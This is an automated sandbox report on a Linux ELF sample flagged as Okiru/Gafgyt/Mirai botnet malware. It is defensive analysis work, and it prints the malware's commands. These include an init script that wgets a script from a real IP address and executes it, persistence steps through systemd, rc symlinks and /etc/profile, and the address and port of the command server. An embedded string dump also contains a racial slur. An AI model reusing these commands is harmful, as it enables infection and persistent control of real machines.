Edit tour

Linux Analysis Report
x86_64.nn.elf

Overview

General Information

Sample name:	x86_64.nn.elf
Analysis ID:	1580241
MD5:	3c2e0d786a9ca6565062a422428fe948
SHA1:	6fd38914e40cb082a125277374ba34fee0432be9
SHA256:	4f81276d66252a396b6282b76acc26275c502dcdcf43620e741de6868db67b96
Tags:	elfuser-abuse_ch
Infos:

Detection

Okiru

Score:	96
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Okiru

Drops files in suspicious directories

Machine Learning detection for sample

Sample deletes itself

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample listens on a socket

Sample tries to set the executable flag

Writes shell script file to disk with an unusual file extension

Yara signature match

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580241
Start date and time:	2024-12-24 05:57:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	x86_64.nn.elf
Detection:	MAL
Classification:	mal96.spre.troj.evad.linELF@0/9@2/0

Runtime Messages

Command:	/tmp/x86_64.nn.elf
PID:	5528
Exit Code:	139
Exit Code Info:	SIGSEGV (11) Segmentation fault invalid memory reference
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

x86_64.nn.elf (PID: 5528, Parent: 5452, MD5: 3c2e0d786a9ca6565062a422428fe948) Arguments: /tmp/x86_64.nn.elf

x86_64.nn.elf New Fork (PID: 5541, Parent: 5528)

sh (PID: 5541, Parent: 5528, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 5550, Parent: 5541)

systemctl (PID: 5550, Parent: 5541, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

x86_64.nn.elf New Fork (PID: 5565, Parent: 5528)

sh (PID: 5565, Parent: 5528, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 5566, Parent: 5565)

chmod (PID: 5566, Parent: 5565, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

x86_64.nn.elf New Fork (PID: 5567, Parent: 5528)

sh (PID: 5567, Parent: 5528, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 5568, Parent: 5567)

ln (PID: 5568, Parent: 5567, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

x86_64.nn.elf New Fork (PID: 5569, Parent: 5528)

sh (PID: 5569, Parent: 5528, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"

x86_64.nn.elf New Fork (PID: 5570, Parent: 5528)

sh (PID: 5570, Parent: 5528, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"

sh New Fork (PID: 5571, Parent: 5570)

chmod (PID: 5571, Parent: 5570, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh

x86_64.nn.elf New Fork (PID: 5572, Parent: 5528)

sh (PID: 5572, Parent: 5528, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 5573, Parent: 5572)

mkdir (PID: 5573, Parent: 5572, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

x86_64.nn.elf New Fork (PID: 5574, Parent: 5528)

sh (PID: 5574, Parent: 5528, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"

sh New Fork (PID: 5575, Parent: 5574)

ln (PID: 5575, Parent: 5574, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh /etc/rc.d/S99sh

x86_64.nn.elf New Fork (PID: 5576, Parent: 5528)

x86_64.nn.elf New Fork (PID: 5578, Parent: 5576)

x86_64.nn.elf New Fork (PID: 5579, Parent: 5576)

udisksd New Fork (PID: 5537, Parent: 803)

dumpe2fs (PID: 5537, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 5563, Parent: 5562)

snapd-env-generator (PID: 5563, Parent: 5562, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 5586, Parent: 803)

dumpe2fs (PID: 5586, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 5620, Parent: 803)

dumpe2fs (PID: 5620, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 5654, Parent: 803)

dumpe2fs (PID: 5654, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
x86_64.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
x86_64.nn.elf	Linux_Trojan_Gafgyt_9e9530a7	unknown	unknown	0xcdd8:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
x86_64.nn.elf	Linux_Trojan_Gafgyt_807911a2	unknown	unknown	0xd5c7:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
x86_64.nn.elf	Linux_Trojan_Gafgyt_d4227dbf	unknown	unknown	0x9e7e:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00 0xa13c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
x86_64.nn.elf	Linux_Trojan_Gafgyt_d996d335	unknown	unknown	0x1017e:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
x86_64.nn.elf	Linux_Trojan_Gafgyt_620087b9	unknown	unknown	0xd187:$a: 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B
x86_64.nn.elf	Linux_Trojan_Gafgyt_33b4111a	unknown	unknown	0xd452:$a: C1 83 E1 0F 74 1A B8 10 00 00 00 48 29 C8 48 8D 0C 02 48 89 DA 48
x86_64.nn.elf	Linux_Trojan_Mirai_e0cf29e2	unknown	unknown	0x5dd2:$a: 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C2 83 FE 01
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author	Strings
5528.1.0000000000400000.0000000000413000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
5528.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_9e9530a7	unknown	unknown	0xcdd8:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
5528.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_807911a2	unknown	unknown	0xd5c7:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
5528.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_d4227dbf	unknown	unknown	0x9e7e:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00 0xa13c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
5528.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_d996d335	unknown	unknown	0x1017e:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
5528.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_620087b9	unknown	unknown	0xd187:$a: 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B
5528.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_33b4111a	unknown	unknown	0xd452:$a: C1 83 E1 0F 74 1A B8 10 00 00 00 48 29 C8 48 8D 0C 02 48 89 DA 48
5528.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Mirai_e0cf29e2	unknown	unknown	0x5dd2:$a: 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C2 83 FE 01
Process Memory Space: x86_64.nn.elf PID: 5528	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Click to see the 4 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: x86_64.nn.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: x86_64.nn.elf

ReversingLabs: Detection: 26%

Machine Learning detection for sample

Source: x86_64.nn.elf

Joe Sandbox ML: detected

Source: x86_64.nn.elf

String: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginnfstftpmallocwaitpidw/etc/motd%s

Source: global traffic

TCP traffic: 192.168.2.15:38198 -> 94.156.227.234:38242

Source: /tmp/x86_64.nn.elf (PID: 5528)

Socket: 0.0.0.0:38242

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234

Source: global traffic

DNS traffic detected: DNS query: daisy.ubuntu.com

Source: x86_64.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.30.dr, bootcmd.12.dr, custom.service.12.dr	String found in binary or memory: http://94.156.227.233/
Source: x86_64.nn.elf, 5528.1.00007ffc1abc7000.00007ffc1abe8000.rw-.sdmp	String found in binary or memory: http://94.156.227.233/lol.sh
Source: x86_64.nn.elf	String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

System Summary

Malicious sample detected (through community Yara rule)

Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
Source: 5528.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 5528.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 5528.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 5528.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 5528.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 5528.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 5528.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/

Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: 5528.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 5528.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 5528.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 5528.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 5528.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 5528.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 5528.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16

Source: classification engine

Classification label: mal96.spre.troj.evad.linELF@0/9@2/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/x86_64.nn.elf (PID: 5528)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/x86_64.nn.elf (PID: 5528)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 5568)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 5575)	File: /etc/rc.d/S99sh -> /etc/init.d/sh	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/x86_64.nn.elf (PID: 5528)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5566)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5571)	File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5640/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5641/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5620/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5642/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5717/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5718/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5719/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5632/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5654/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5633/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5634/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5635/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5636/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5713/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5637/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5714/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5638/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5715/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5639/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5716/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5371/cmdline	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5630/status	Jump to behavior
